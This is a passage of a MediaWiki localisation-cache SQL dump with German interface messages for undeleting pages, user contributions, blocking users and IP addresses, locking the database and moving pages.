week,2 Wochen:2 weeks,1 Monat:1 month,3 Monate:3 months,6 Monate:6 months,1 Jahr:1 year,Unbeschränkt:infinite\";'),('de','messages:restriction-type','s:13:\"Schutzstatus:\";'),('de','messages:restriction-level','s:12:\"Schutzhöhe:\";'),('de','messages:minimum-size','s:14:\"Mindestgröße\";'),('de','messages:maximum-size','s:15:\"Maximalgröße:\";'),('de','messages:pagesize','s:7:\"(Bytes)\";'),('de','messages:restriction-edit','s:10:\"Bearbeiten\";'),('de','messages:restriction-move','s:11:\"Verschieben\";'),('de','messages:restriction-create','s:9:\"Erstellen\";'),('de','messages:restriction-upload','s:9:\"Hochladen\";'),('de','messages:restriction-level-sysop','s:32:\"geschützt (nur Administratoren)\";'),('de','messages:restriction-level-autoconfirmed','s:49:\"geschützt (nur angemeldete, nicht neue Benutzer)\";'),('de','messages:restriction-level-all','s:4:\"alle\";'),('de','messages:undelete','s:26:\"Gelöschte Seiten anzeigen\";'),('de','messages:undeletepage','s:47:\"Gelöschte Seiten anzeigen und wiederherstellen\";'),('de','messages:undeletepagetitle','s:74:\"\'\'\'Die folgende Ausgabe zeigt die gelöschten Versionen von [[:$1|$1]]\'\'\'.\";'),('de','messages:viewdeletedpage','s:26:\"Gelöschte Seiten anzeigen\";'),('de','messages:undeletepagetext','s:152:\"Die {{PLURAL:$1|folgende Seite wurde gelöscht und kann|folgenden $1 Seiten wurden gelöscht und können}} von Administratoren wiederhergestellt werden:\";'),('de','messages:undelete-fieldset-title','s:16:\"Wiederherstellen\";'),('de','messages:undeleteextrahelp','s:338:\"* Um die Seite mitsamt aller Versionen wiederherzustellen, wähle keine Version aus, gib eine Begründung an und klicke dann auf „{{int:undeletebtn}}“.\n* Um lediglich bestimmte Versionen der Seite wiederherzustellen, wähle die betreffenden Versionen einzeln aus, gib eine Begründung an und klicke dann auf „{{int:undeletebtn}}“.\";'),('de','messages:undeleterevisions','s:47:\"{{PLURAL:$1|1 Version|$1 Versionen}} archiviert\";'),('de','messages:undeletehistory','s:255:\"Wenn du diese Seite wiederherstellst, werden auch alle alten Versionen wiederhergestellt.\nWenn seit der Löschung eine neue Seite gleichen Namens erstellt wurde, werden die wiederhergestellten Versionen chronologisch in die Versionsgeschichte eingeordnet.\";'),('de','messages:undeleterevdel','s:256:\"Die Wiederherstellung wird nicht durchgeführt, wenn die aktuellste Version versteckt ist oder versteckte Teile enthält.\nIn diesem Fall darf die aktuellste Version nicht markiert werden oder ihr Status muss auf den einer normalen Version geändert werden.\";'),('de','messages:undeletehistorynoadmin','s:251:\"Diese Seite wurde gelöscht. Der Löschgrund ist in der Zusammenfassung angegeben,\ngenauso wie Details zum letzten Benutzer, der diese Seite vor der Löschung bearbeitet hat.\nDer aktuelle Text der gelöschten Seite ist nur Administratoren zugänglich.\";'),('de','messages:undelete-revision','s:49:\"Gelöschte Version von $1 (vom $4 um $5 Uhr), $3:\";'),('de','messages:undeleterevision-missing','s:133:\"Ungültige oder fehlende Version. Entweder ist der Link falsch oder die Version wurde aus dem Archiv wiederhergestellt oder entfernt.\";'),('de','messages:undelete-nodiff','s:38:\"Keine vorhergehende Version vorhanden.\";'),('de','messages:undeletebtn','s:16:\"Wiederherstellen\";'),('de','messages:undeletelink','s:24:\"ansehen/wiederherstellen\";'),('de','messages:undeleteviewlink','s:7:\"ansehen\";'),('de','messages:undeleteinvert','s:16:\"Auswahl umkehren\";'),('de','messages:undeletecomment','s:6:\"Grund:\";'),('de','messages:undeletedrevisions','s:67:\"{{PLURAL:$1|1 Version wurde|$1 Versionen wurden}} wiederhergestellt\";'),('de','messages:undeletedrevisions-files','s:98:\"{{PLURAL:$1|1 Version|$1 Versionen}} und {{PLURAL:$2|1 Datei|$2 Dateien}} wurden wiederhergestellt\";'),('de','messages:undeletedfiles','s:63:\"{{PLURAL:$1|1 Datei wurde|$1 Dateien wurden}} wiederhergestellt\";'),('de','messages:cannotundelete','s:44:\"Die Wiederherstellung ist fehlgeschlagen:\n$1\";'),('de','messages:undeletedpage','s:156:\"\'\'\'„$1“\'\'\' wurde wiederhergestellt.\n\nIm [[Special:Log/delete|Lösch-Logbuch]] findest du eine Übersicht der gelöschten und wiederhergestellten Seiten.\";'),('de','messages:undelete-header','s:81:\"Siehe das [[Special:Log/delete|Lösch-Logbuch]] für kürzlich gelöschte Seiten.\";'),('de','messages:undelete-search-title','s:30:\"Nach gelöschten Seiten suchen\";'),('de','messages:undelete-search-box','s:30:\"Nach gelöschten Seiten suchen\";'),('de','messages:undelete-search-prefix','s:40:\"Suchbegriff (Wortanfang ohne Wildcards):\";'),('de','messages:undelete-search-submit','s:6:\"Suchen\";'),('de','messages:undelete-no-results','s:65:\"Es wurde im Archiv keine zum Suchbegriff passende Seite gefunden.\";'),('de','messages:undelete-filename-mismatch','s:118:\"Die Dateiversion mit dem Zeitstempel $1 konnte nicht wiederhergestellt werden: Die Dateinamen passen nicht zueinander.\";'),('de','messages:undelete-bad-store-key','s:139:\"Die Dateiversion mit dem Zeitstempel $1 konnte nicht wiederhergestellt werden: Die Datei war bereits vor dem Löschen nicht mehr vorhanden.\";'),('de','messages:undelete-cleanup-error','s:55:\"Fehler beim Löschen der unbenutzten Archiv-Version $1.\";'),('de','messages:undelete-missing-filearchive','s:165:\"Die Datei mit der Archiv-ID $1 kann nicht wiederhergestellt werden, da sie nicht in der Datenbank vorhanden ist. Möglicherweise wurde sie bereits wiederhergestellt.\";'),('de','messages:undelete-error','s:59:\"Beim Wiederherstellen der Seite ist ein Fehler aufgetreten.\";'),('de','messages:undelete-error-short','s:41:\"Fehler beim Wiederherstellen der Datei $1\";'),('de','messages:undelete-error-long','s:68:\"Es wurden Fehler beim Wiederherstellen einer Datei festgestellt:\n\n$1\";'),('de','messages:undelete-show-file-confirm','s:112:\"Bist du sicher, dass du eine gelöschte Version der Datei „$1“ vom $2, $3 Uhr sehen willst?\";'),('de','messages:undelete-show-file-submit','s:2:\"Ja\";'),('de','messages:namespace','s:11:\"Namensraum:\";'),('de','messages:invert','s:16:\"Auswahl umkehren\";'),('de','messages:tooltip-invert','s:150:\"Dieses Auswahlfeld anklicken, um Änderungen im gewählten Namensraum und, sofern ausgewählt, dem entsprechenden zugehörigen Namensraum auszublenden\";'),('de','messages:namespace_association','s:23:\"Zugehöriger Namensraum\";'),('de','messages:tooltip-namespace_association','s:160:\"Dieses Auswahlfeld anklicken, um den deiner Auswahl zugehörigen Diskussionsnamensraum, oder im umgekehrten Fall, den zugehörigen Namensraum, mit einzubeziehen\";'),('de','messages:blanknamespace','s:8:\"(Seiten)\";'),('de','messages:contributions','s:31:\"{{GENDER:$1|Benutzerbeiträge}}\";'),('de','messages:contributions-title','s:30:\"Benutzerbeiträge von „$1“\";'),('de','messages:mycontris','s:9:\"Beiträge\";'),('de','messages:contribsub2','s:25:\"Von {{GENDER:$3|$1}} ($2)\";'),('de','messages:contributions-userdoesnotexist','s:47:\"Das Benutzerkonto „$1“ ist nicht vorhanden.\";'),('de','messages:nocontribs','s:64:\"Es wurden keine Benutzerbeiträge mit diesen Kriterien gefunden.\";'),('de','messages:uctop','s:9:\"(aktuell)\";'),('de','messages:month','s:10:\"und Monat:\";'),('de','messages:year','s:9:\"bis Jahr:\";'),('de','messages:sp-contributions-newbies','s:34:\"Zeige nur Beiträge neuer Benutzer\";'),('de','messages:sp-contributions-newbies-sub','s:19:\"Von neuen Benutzern\";'),('de','messages:sp-contributions-newbies-title','s:37:\"Benutzerbeiträge von neuen Benutzern\";'),('de','messages:sp-contributions-blocklog','s:13:\"Sperr-Logbuch\";'),('de','messages:sp-contributions-suppresslog','s:31:\"Unterdrückte Benutzerbeiträge\";'),('de','messages:sp-contributions-deleted','s:20:\"Gelöschte Beiträge\";'),('de','messages:sp-contributions-uploads','s:20:\"Hochgeladene Dateien\";'),('de','messages:sp-contributions-logs','s:10:\"Logbücher\";'),('de','messages:sp-contributions-talk','s:10:\"Diskussion\";'),('de','messages:sp-contributions-userrights','s:24:\"Benutzerrechteverwaltung\";'),('de','messages:sp-contributions-blocked-notice','s:145:\"{{GENDER:$1|Dieser Benutzer|Diese Benutzerin|Dieser Benutzer}} ist derzeit gesperrt. Es folgt der aktuelle Eintrag aus dem Benutzersperr-Logbuch:\";'),('de','messages:sp-contributions-blocked-notice-anon','s:103:\"Diese IP-Adresse ist zurzeit gesperrt.\nZur Information folgt der aktuelle Auszug aus dem Sperr-Logbuch:\";'),('de','messages:sp-contributions-search','s:29:\"Suche nach Benutzerbeiträgen\";'),('de','messages:sp-contributions-username','s:29:\"IP-Adresse oder Benutzername:\";'),('de','messages:sp-contributions-toponly','s:29:\"Nur aktuelle Versionen zeigen\";'),('de','messages:sp-contributions-newonly','s:31:\"Nur Seitenerstellungen anzeigen\";'),('de','messages:sp-contributions-submit','s:6:\"Suchen\";'),('de','messages:whatlinkshere','s:21:\"Links auf diese Seite\";'),('de','messages:whatlinkshere-title','s:34:\"Seiten, die auf „$1“ verlinken\";'),('de','messages:whatlinkshere-page','s:6:\"Seite:\";'),('de','messages:linkshere','s:55:\"Die folgenden Seiten verlinken auf \'\'\'„[[:$1]]“\'\'\':\";'),('de','messages:nolinkshere','s:45:\"Keine Seite verlinkt auf \'\'\'„[[:$1]]“\'\'\'.\";'),('de','messages:nolinkshere-ns','s:70:\"Keine Seite verlinkt auf \'\'\'„[[:$1]]“\'\'\' im gewählten Namensraum.\";'),('de','messages:isredirect','s:19:\"Weiterleitungsseite\";'),('de','messages:istemplate','s:18:\"Vorlageneinbindung\";'),('de','messages:isimage','s:9:\"Dateilink\";'),('de','messages:whatlinkshere-prev','s:37:\"{{PLURAL:$1|vorheriger|vorherige $1}}\";'),('de','messages:whatlinkshere-next','s:35:\"{{PLURAL:$1|nächster|nächste $1}}\";'),('de','messages:whatlinkshere-links','s:9:\"← Links\";'),('de','messages:whatlinkshere-hideredirs','s:18:\"Weiterleitungen $1\";'),('de','messages:whatlinkshere-hidetrans','s:23:\"Vorlageneinbindungen $1\";'),('de','messages:whatlinkshere-hidelinks','s:8:\"Links $1\";'),('de','messages:whatlinkshere-hideimages','s:13:\"Dateilinks $1\";'),('de','messages:whatlinkshere-filters','s:6:\"Filter\";'),('de','messages:autoblockid','s:25:\"Automatische Sperrung #$1\";'),('de','messages:block','s:16:\"Benutzer sperren\";'),('de','messages:unblock','s:18:\"Benutzer freigeben\";'),('de','messages:blockip','s:52:\"IP-Adresse/{{GENDER:$1|Benutzer|Benutzerin}} sperren\";'),('de','messages:blockip-legend','s:27:\"IP-Adresse/Benutzer sperren\";'),('de','messages:blockiptext','s:309:\"Mit diesem Formular sperrst du eine IP-Adresse oder einen Benutzernamen, so dass von dort keine Änderungen mehr vorgenommen werden können.\nDies sollte nur erfolgen, um Vandalismus zu verhindern und in Übereinstimmung mit den [[{{MediaWiki:Policy-url}}|Richtlinien]].\nBitte gib den Grund für die Sperre an.\";'),('de','messages:ipaddressorusername','s:29:\"IP-Adresse oder Benutzername:\";'),('de','messages:ipbexpiry','s:11:\"Sperrdauer:\";'),('de','messages:ipbreason','s:6:\"Grund:\";'),('de','messages:ipbreason-dropdown','s:266:\"* Allgemeine Sperrgründe\n** Einfügen falscher Informationen\n** Leeren von Seiten\n** Massenweises Einfügen externer Links\n** Einstellen unsinniger Inhalte in Seiten\n** Ungebührliches Verhalten\n** Missbrauch mit mehreren Benutzerkonten\n** Ungeeigneter Benutzername\";'),('de','messages:ipb-hardblock','s:85:\"Angemeldete Benutzer daran hindern, Bearbeitungen unter dieser IP-Adresse vorzunehmen\";'),('de','messages:ipbcreateaccount','s:40:\"Erstellung von Benutzerkonten verhindern\";'),('de','messages:ipbemailban','s:22:\"E-Mail-Versand sperren\";'),('de','messages:ipbenableautoblock','s:168:\"Sperre die aktuell von diesem Benutzer genutzte IP-Adresse sowie automatisch alle folgenden, von denen aus er Bearbeitungen oder das Anlegen von Benutzerkonten versucht\";'),('de','messages:ipbsubmit','s:27:\"IP-Adresse/Benutzer sperren\";'),('de','messages:ipbother','s:24:\"Andere Dauer (englisch):\";'),('de','messages:ipboptions','s:164:\"2 Stunden:2 hours,1 Tag:1 day,3 Tage:3 days,1 Woche:1 week,2 Wochen:2 weeks,1 Monat:1 month,3 Monate:3 months,6 Monate:6 months,1 Jahr:1 year,unbeschränkt:infinite\";'),('de','messages:ipbhidename','s:51:\"Benutzername in Bearbeitungen und Listen verstecken\";'),('de','messages:ipbwatchuser','s:37:\"Benutzer(diskussions)seite beobachten\";'),('de','messages:ipb-disableusertalk','s:98:\"Diesen Benutzer daran hindern seine eigene Diskussionsseite zu bearbeiten, solange er gesperrt ist\";'),('de','messages:ipb-change-block','s:42:\"Sperre mit diesen Sperrparametern erneuern\";'),('de','messages:ipb-confirm','s:20:\"Sperrung bestätigen\";'),('de','messages:badipaddress','s:39:\"Die IP-Adresse hat ein falsches Format.\";'),('de','messages:blockipsuccesssub','s:29:\"Die Sperrung war erfolgreich.\";'),('de','messages:blockipsuccesstext','s:169:\"Der Benutzer / die IP-Adresse [[Special:Contributions/$1|$1]] wurde gesperrt.
                                                                \nZur Aufhebung der Sperre siehe die [[Special:BlockList|Liste aller aktiven Sperren]].\";'),('de','messages:ipb-blockingself','s:76:\"Du bist gerade dabei, dich selbst zu sperren! Möchtest du das wirklich tun?\";'),('de','messages:ipb-confirmhideuser','s:205:\"Du bist gerade dabei, einen Benutzer im Modus „Benutzer verstecken“ zu sperren. Dies führt dazu, dass der Benutzername in allen Listen und Logbüchern unterdrückt wird. Möchtest du das wirklich tun?\";'),('de','messages:ipb-confirmaction','s:121:\"Wenn du dir sicher bist, dass du dies wirklich tun möchtest, überprüfe bitte unten das Feld „{{int:ipb-confirm}}“.\";'),('de','messages:ipb-edit-dropdown','s:23:\"Sperrgründe bearbeiten\";'),('de','messages:ipb-unblock-addr','s:18:\"„$1“ freigeben\";'),('de','messages:ipb-unblock','s:29:\"IP-Adresse/Benutzer freigeben\";'),('de','messages:ipb-blocklist','s:31:\"Alle aktuellen Sperren anzeigen\";'),('de','messages:ipb-blocklist-contribs','s:44:\"Benutzerbeiträge von „{{GENDER:$1|$1}}“\";'),('de','messages:unblockip','s:18:\"Benutzer freigeben\";'),('de','messages:unblockiptext','s:76:\"Mit diesem Formular kannst du eine IP-Adresse oder einen Benutzer freigeben.\";'),('de','messages:ipusubmit','s:9:\"Freigeben\";'),('de','messages:unblocked','s:32:\"[[User:$1|$1]] wurde freigegeben\";'),('de','messages:unblocked-range','s:31:\"Sperre für $1 wurde aufgehoben\";'),('de','messages:unblocked-id','s:29:\"Sperr-ID $1 wurde freigegeben\";'),('de','messages:unblocked-ip','s:50:\"[[Special:Contributions/$1|$1]] wurde freigegeben.\";'),('de','messages:blocklist','s:18:\"Gesperrte Benutzer\";'),('de','messages:ipblocklist','s:18:\"Gesperrte Benutzer\";'),('de','messages:ipblocklist-legend','s:36:\"Suche nach einem gesperrten Benutzer\";'),('de','messages:blocklist-userblocks','s:26:\"Benutzersperren ausblenden\";'),('de','messages:blocklist-tempblocks','s:29:\"Befristete Sperren ausblenden\";'),('de','messages:blocklist-addressblocks','s:40:\"Sperren einzelner IP-Adressen ausblenden\";'),('de','messages:blocklist-rangeblocks','s:26:\"Bereichssperren ausblenden\";'),('de','messages:blocklist-timestamp','s:11:\"Zeitstempel\";'),('de','messages:blocklist-target','s:4:\"Ziel\";'),('de','messages:blocklist-expiry','s:14:\"Sperrdauer bis\";'),('de','messages:blocklist-by','s:12:\"Gesperrt von\";'),('de','messages:blocklist-params','s:14:\"Sperrparameter\";'),('de','messages:blocklist-reason','s:5:\"Grund\";'),('de','messages:ipblocklist-submit','s:6:\"Suchen\";'),('de','messages:ipblocklist-localblock','s:13:\"Lokale Sperre\";'),('de','messages:ipblocklist-otherblocks','s:35:\"Andere {{PLURAL:$1|Sperre|Sperren}}\";'),('de','messages:infiniteblock','s:10:\"unbegrenzt\";'),('de','messages:expiringblock','s:21:\"endet am $1 um $2 Uhr\";'),('de','messages:anononlyblock','s:11:\"nur Anonyme\";'),('de','messages:noautoblockblock','s:21:\"Autoblock deaktiviert\";'),('de','messages:createaccountblock','s:38:\"Erstellung von Benutzerkonten gesperrt\";'),('de','messages:emailblock','s:23:\"E-Mail-Versand gesperrt\";'),('de','messages:blocklist-nousertalk','s:45:\"darf eigene Diskussionsseite nicht bearbeiten\";'),('de','messages:ipblocklist-empty','s:35:\"Die Liste enthält keine Einträge.\";'),('de','messages:ipblocklist-no-results','s:60:\"Die gesuchte IP-Adresse/der Benutzername ist nicht gesperrt.\";'),('de','messages:blocklink','s:7:\"Sperren\";'),('de','messages:unblocklink','s:9:\"Freigeben\";'),('de','messages:change-blocklink','s:14:\"Sperre ändern\";'),('de','messages:contribslink','s:9:\"Beiträge\";'),('de','messages:emaillink','s:13:\"E-Mail senden\";'),('de','messages:autoblocker','s:116:\"Automatische Sperre, da du eine gemeinsame IP-Adresse mit [[User:$1|$1]] benutzt.\nGrund der Benutzersperre: „$2“\";'),('de','messages:blocklogpage','s:21:\"Benutzersperr-Logbuch\";'),('de','messages:blocklog-showlog','s:144:\"{{GENDER:$1|Dieser Benutzer|Diese Benutzerin|Dieser Benutzer}} wurde schon früher gesperrt. Es folgt der Eintrag aus dem Benutzersperr-Logbuch:\";'),('de','messages:blocklog-showsuppresslog','s:160:\"{{GENDER:$1|Dieser Benutzer|Diese Benutzerin|Dieser Benutzer}} wurde schon früher gesperrt und versteckt.\nEs folgt der Eintrag aus dem Unterdrückungs-Logbuch:\";'),('de','messages:blocklogentry','s:45:\"sperrte „[[$1]]“ für den Zeitraum: $2 $3\";'),('de','messages:reblock-logentry','s:61:\"änderte die Sperre von „[[$1]]“ für den Zeitraum: $2 $3\";'),('de','messages:blocklogtext','s:252:\"Dies ist das Logbuch über Sperrungen und Entsperrungen von Benutzern und IP-Adressen.\nAutomatisch gesperrte IP-Adressen werden nicht erfasst.\nSiehe die [[Special:BlockList|Liste der gesperrten IP-Adressen und Benutzernamen]] für alle aktiven Sperren.\";'),('de','messages:unblocklogentry','s:31:\"hob die Sperre von „$1“ auf\";'),('de','messages:block-log-flags-anononly','s:11:\"nur Anonyme\";'),('de','messages:block-log-flags-nocreate','s:38:\"Erstellung von Benutzerkonten gesperrt\";'),('de','messages:block-log-flags-noautoblock','s:21:\"Autoblock deaktiviert\";'),('de','messages:block-log-flags-noemail','s:23:\"E-Mail-Versand gesperrt\";'),('de','messages:block-log-flags-nousertalk','s:45:\"darf eigene Diskussionsseite nicht bearbeiten\";'),('de','messages:block-log-flags-angry-autoblock','s:31:\"erweiterter Autoblock aktiviert\";'),('de','messages:block-log-flags-hiddenname','s:22:\"Benutzername versteckt\";'),('de','messages:range_block_disabled','s:69:\"Die Möglichkeit, ganze Adressräume zu sperren, ist nicht aktiviert.\";'),('de','messages:ipb_expiry_invalid','s:36:\"Die eingegebene Dauer ist ungültig.\";'),('de','messages:ipb_expiry_temp','s:72:\"Benutzernamens-Sperren mit der Verstecken-Option müssen permanent sein.\";'),('de','messages:ipb_hide_invalid','s:117:\"Dieses Konto kann nicht unterdrückt werden, da es mehr als {{PLURAL:$1|eine Bearbeitung|$1 Bearbeitungen}} aufweist.\";'),('de','messages:ipb_already_blocked','s:29:\"„$1“ ist bereits gesperrt\";'),('de','messages:ipb-needreblock','s:71:\"„$1“ ist bereits gesperrt. Möchtest du die Sperrparameter ändern?\";'),('de','messages:ipb-otherblocks-header','s:35:\"Andere {{PLURAL:$1|Sperre|Sperren}}\";'),('de','messages:unblock-hideuser','s:84:\"Dieser Benutzer kann nicht entsperrt werden, da dessen Benutzername versteckt wurde.\";'),('de','messages:ipb_cant_unblock','s:72:\"Fehler: Sperr-ID $1 nicht gefunden. Die Sperre wurde bereits aufgehoben.\";'),('de','messages:ipb_blocked_as_range','s:133:\"Fehler: Die IP-Adresse $1 wurde als Teil der Bereichssperre $2 indirekt gesperrt. Eine Entsperrung von $1 alleine ist nicht möglich.\";'),('de','messages:ip_range_invalid','s:29:\"Ungültiger IP-Adressbereich.\";'),('de','messages:ip_range_toolarge','s:62:\"Adressbereiche, die größer als /$1 sind, sind nicht erlaubt.\";'),('de','messages:proxyblocker','s:13:\"Proxy blocker\";'),('de','messages:proxyblockreason','s:200:\"Deine IP-Adresse wurde gesperrt, da sie ein offener Proxy ist. Bitte kontaktiere deinen Internet-Provider oder deine Systemadministratoren und informiere sie über dieses mögliche Sicherheitsproblem.\";'),('de','messages:sorbsreason','s:76:\"Die IP-Adresse ist in der DNSBL von {{SITENAME}} als offener PROXY gelistet.\";'),('de','messages:sorbs_create_account_reason','s:123:\"Die IP-Adresse ist in der DNSBL von {{SITENAME}} als offener PROXY gelistet. Das Anlegen neuer Benutzer ist nicht möglich.\";'),('de','messages:xffblockreason','s:147:\"Eine IP-Adresse im X-Forwarded-For-Header wurde gesperrt, entweder deine oder die des benutzten Proxyservers. Der ursprüngliche Sperrgrund war: $1\";'),('de','messages:cant-see-hidden-user','s:186:\"Der Benutzer, den du versuchst zu sperren, wurde bereits gesperrt und verborgen. Da du das „hideuser“-Recht nicht hast, kannst du die Benutzersperre nicht sehen und nicht bearbeiten.\";'),('de','messages:ipbblocked','s:84:\"Du kannst keine anderen Benutzer sperren oder entsperren, da du selbst gesperrt bist\";'),('de','messages:ipbnounblockself','s:57:\"Du hast nicht die Berechtigung, dich selbst zu entsperren\";'),('de','messages:lockdb','s:17:\"Datenbank sperren\";'),('de','messages:unlockdb','s:19:\"Datenbank freigeben\";'),('de','messages:lockdbtext','s:155:\"Mit dem Sperren der Datenbank werden alle Änderungen an Benutzereinstellungen, Beobachtungslisten, Seiten usw. verhindert. Bitte die Sperrung bestätigen.\";'),('de','messages:unlockdbtext','s:105:\"Das Aufheben der Datenbank-Sperre wird alle Änderungen wieder zulassen. Bitte die Aufhebung bestätigen.\";'),('de','messages:lockconfirm','s:38:\"Ja, ich möchte die Datenbank sperren.\";'),('de','messages:unlockconfirm','s:40:\"Ja, ich möchte die Datenbank freigeben.\";'),('de','messages:lockbtn','s:17:\"Datenbank sperren\";'),('de','messages:unlockbtn','s:19:\"Datenbank freigeben\";'),('de','messages:locknoconfirm','s:45:\"Du hast das Bestätigungsfeld nicht markiert.\";'),('de','messages:lockdbsuccesssub','s:36:\"Datenbank wurde erfolgreich gesperrt\";'),('de','messages:unlockdbsuccesssub','s:39:\"Datenbank wurde erfolgreich freigegeben\";'),('de','messages:lockdbsuccesstext','s:143:\"Die {{SITENAME}}-Datenbank wurde gesperrt.
                                                                Bitte gib die Datenbank [[Special:UnlockDB|wieder frei]], sobald die Wartung abgeschlossen ist.\";'),('de','messages:unlockdbsuccesstext','s:45:\"Die {{SITENAME}}-Datenbank wurde freigegeben.\";'),('de','messages:lockfilenotwritable','s:138:\"Die Datenbank-Sperrdatei ist nicht beschreibbar. Zum Sperren oder Freigeben der Datenbank muss diese für den Webserver beschreibbar sein.\";'),('de','messages:databasenotlocked','s:33:\"Die Datenbank ist nicht gesperrt.\";'),('de','messages:lockedbyandtime','s:24:\"(von $1 am $2 um $3 Uhr)\";'),('de','messages:move-page','s:24:\"Verschieben von „$1“\";'),('de','messages:move-page-legend','s:17:\"Seite verschieben\";'),('de','messages:movepagetext','s:1043:\"Mit untenstehendem Formular kannst du eine Seite umbenennen, indem du sie mitsamt allen Versionen auf einen neuen Titel verschiebst.\nDer alte Titel wird danach zum neuen weiterleiten.\nDu kannst Weiterleitungen, die auf den Originaltitel verlinken, automatisch korrigieren lassen.\nStelle sicher, dass du im Anschluss alle [[Special:DoubleRedirects|doppelten]] oder [[Special:BrokenRedirects|defekten Weiterleitungen]] überprüfst.\nDu bist dafür verantwortlich, dass Links weiterhin auf das korrekte Ziel verweisen.\n\nDie Seite wird \'\'\'nicht\'\'\' verschoben, sofern es bereits eine Seite mit dem vorgesehenen Titel gibt, es sei denn, letztere ist eine Weiterleitung ohne Versionsgeschichte.\nDies bedeutet, dass du die Umbenennung rückgängig machen kannst, sofern du einen Fehler gemacht hast. Du kannst hingegen keine existierende Seite überschreiben.\n\n\'\'\'Warnung!\'\'\'\nDie Verschiebung kann weitreichende und unerwartete Folgen für häufig besuchte Seiten haben.\nDu solltest daher die Konsequenzen verstanden haben, bevor du jetzt fortfährst.\";'),('de','messages:movepagetext-noredirectfixer','s:944:\"Mit untenstehendem Formular kannst du eine Seite umbenennen, indem du sie mitsamt allen Versionen auf einen neuen Titel verschiebst.\nDer alte Titel wird danach zum neuen weiterleiten.\nStelle sicher, dass du im Anschluss alle [[Special:DoubleRedirects|doppelten]] oder [[Special:BrokenRedirects|defekten Weiterleitungen]] überprüfst.\nDu bist dafür verantwortlich, dass Links weiterhin auf das korrekte Ziel verweisen.\n\nDie Seite wird \'\'\'nicht\'\'\' verschoben, sofern es bereits eine Seite mit dem vorgesehenen Titel gibt, es sei denn, diese ist eine Weiterleitung ohne Versionsgeschichte.\nDies bedeutet, dass du die Umbenennung rückgängig machen kannst, sofern du einen Fehler gemacht hast. Du kannst hingegen keine existierende Seite überschreiben.\n\n\'\'\'Warnung!\'\'\'\nDie Verschiebung kann weitreichende und unerwartete Folgen für häufig besuchte Seiten haben.\nDu solltest daher die Konsequenzen verstanden haben, bevor du jetzt fortfährst.\";'),('de','messages:movepagetalktext','s:418:\"Die dazugehörige Diskussionsseite wird, sofern vorhanden, mitverschoben, \'\'\'es sei denn:\'\'\'\n*Es existiert bereits eine Diskussionsseite mit diesem Namen, oder\n*du wählst die unten stehende Option ab.\n\nIn diesen Fällen musst du, falls gewünscht, den Inhalt der Seite von Hand verschieben oder zusammenführen.\n\nBitte den \'\'\'neuen\'\'\' Titel unter \'\'\'Ziel\'\'\' eintragen, darunter die Umbenennung bitte \'\'\'begründen.\'\'\'\";'),('de','messages:movearticle','s:18:\"Seite verschieben:\";'),('de','messages:moveuserpage-warning','s:172:\"\'\'\'Warnung:\'\'\' Du bist dabei, eine Benutzerseite zu verschieben. Bitte bedenke, dass dadurch nur die Benutzerseite verschoben, \'\'\'nicht\'\'\' aber der Benutzer umbenannt wird.\";'),('de','messages:movecategorypage-warning','s:218:\"Warnung: Du bist gerade dabei, eine Kategorieseite zu verschieben. Bitte sei dir bewusst, dass nur die Seite verschoben wird. Alle Seiten in der alten Kategorie werden nicht neu kategorisiert.\";'),('de','messages:movenologintext','s:108:\"Du musst ein registrierter Benutzer und [[Special:UserLogin|angemeldet]] sein, um eine Seite zu verschieben.\";'),('de','messages:movenotallowed','s:79:\"Du hast nicht die erforderliche Berechtigung, um Seiten verschieben zu können.\";'),('de','messages:movenotallowedfile','s:80:\"Du hast nicht die erforderliche Berechtigung, um Dateien verschieben zu können.\";'),('de','messages:cant-move-user-page','s:89:\"Du hast nicht die erforderliche Berechtigung, Benutzerhauptseiten verschieben zu können.\";'),('de','messages:cant-move-to-user-page','s:116:\"Du hast nicht die Berechtigung, Seiten auf eine Benutzerseite zu verschieben (mit Ausnahme von Benutzerunterseiten).\";'),('de','messages:cant-move-category-page','s:62:\"Du hast keine Berechtigung, um Kategorieseiten zu verschieben.\";'),('de','messages:cant-move-to-category-page','s:81:\"Du hast keine Berechtigung, um eine Seite zu einer Kategorieseite zu verschieben.\";'),('de','messages:newtitle','s:5:\"Ziel:\";'),('de','messages:move-watch','s:31:\"Quell- und Zielseite beobachten\";'),('de','messages:movepagebtn','s:17:\"Seite verschieben\";'),('de','messages:pagemovedsub','s:24:\"Verschiebung erfolgreich\";'),('de','messages:movepage-moved','s:56:\"\'\'\'Die Seite „$1“ wurde nach „$2“ verschoben.\'\'\'\";'),('de','messages:movepage-moved-redirect','s:34:\"Eine Weiterleitung wurde erstellt.\";'),('de','messages:movepage-moved-noredirect','s:54:\"Die Erstellung einer Weiterleitung wurde unterdrückt.\";'),('de','messages:articleexists','s:82:\"Unter diesem Namen existiert bereits eine Seite. Bitte wähle einen anderen Namen.\";'),('de','messages:cantmove-titleprotected','s:95:\"Die Verschiebung kann nicht durchgeführt werden, da der Zieltitel zur Erstellung gesperrt ist.\";'),('de','messages:movetalk','s:52:\"Sofern möglich, die Diskussionsseite mitverschieben\";'),('de','messages:move-subpages','s:35:\"Unterseiten verschieben (bis zu $1)\";'),('de','messages:move-talk-subpages','s:56:\"Unterseiten der Diskussionsseite verschieben (bis zu $1)\";'),('de','messages:movepage-page-exists','s:90:\"Die Seite „$1“ ist bereits vorhanden und kann nicht automatisch überschrieben werden.\";'),('de','messages:movepage-page-moved','s:50:\"Die Seite „$1“ wurde nach „$2“ verschoben.\";'),('de','messages:movepage-page-unmoved','s:64:\"Die Seite „$1“ konnte nicht nach „$2“ verschoben werden.\";'),('de','messages:movepage-max-pages','s:135:\"Die Maximalanzahl von $1 {{PLURAL:$1|Seite|Seiten}} wurde verschoben, Alle weiteren Seiten können nicht automatisch verschoben werden.\";'),('de','messages:movelogpage','s:21:\"Verschiebungs-Logbuch\";'),('de','messages:movelogpagetext','s:46:\"Dies ist eine Liste aller verschobenen Seiten.\";'),('de','messages:movesubpage','s:36:\"{{PLURAL:$1|Unterseite|Unterseiten}}\";'),('de','messages:movesubpagetext','s:56:\"Diese Seite hat $1 {{PLURAL:$1|Unterseite|Unterseiten}}.\";'),('de','messages:movenosubpage','s:34:\"Diese Seite hat keine Unterseiten.\";'),('de','messages:movereason','s:6:\"Grund:\";'),('de','messages:revertmove','s:19:\"zurück verschieben\";'),('de','messages:delete_and_move','s:24:\"Löschen und verschieben\";'),('de','messages:delete_and_move_text','s:138:\"== Löschung erforderlich ==\n\nDie Seite „[[:$1]]“ existiert bereits. Möchtest du diese löschen, um die Seite verschieben zu können?\";'),('de','messages:delete_and_move_confirm','s:18:\"Ja, Seite löschen\";'),('de','messages:delete_and_move_reason','s:68:\"gelöscht, um Platz für die 